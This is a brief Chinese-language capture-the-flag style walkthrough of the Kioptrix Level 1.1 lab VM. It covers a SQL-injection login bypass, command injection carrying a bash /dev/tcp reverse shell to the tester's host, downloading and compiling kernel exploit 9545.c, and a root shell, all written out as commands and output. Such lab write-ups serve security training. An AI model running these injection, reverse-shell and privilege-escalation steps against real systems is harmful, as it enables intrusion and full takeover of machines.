kioptrix level-1.1
存活检测
端口扫描
80访问
查看源代码
尝试爆破,先试一下,无结果
尝试万能密码,sql注入
万能密码可以绕过登录
替换数据包进行登录
登录成功
命令执行
反弹shell
127.0.0.1 | bash -i >& /dev/tcp/192.168.245.183/5454 0>&1
nv -lvvp 5454
提权
uname -a 查看版本
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
searchsploit 9545
/usr/share/exploitdb/exploits/linux/local/9545.c
└─# nc -lvvp 5454 1 ⨯
listening on [any] 5454 ...
connect to [192.168.245.183] from localhost [192.168.245.97] 32773
bash: no job control in this shell
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.245.183/9545.c
--00:27:28-- http://192.168.245.183/9545.c
=> `9545.c'
Connecting to 192.168.245.183:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/plain]
0K ......... 100% 640.87 MB/s
00:27:28 (640.87 MB/s) - `9545.c' saved [9408/9408]
bash-3.00$ ls
9545.c
bash-3.00$ gcc -o muma 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
9545.c
muma
bash-3.00$ ./muma
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00#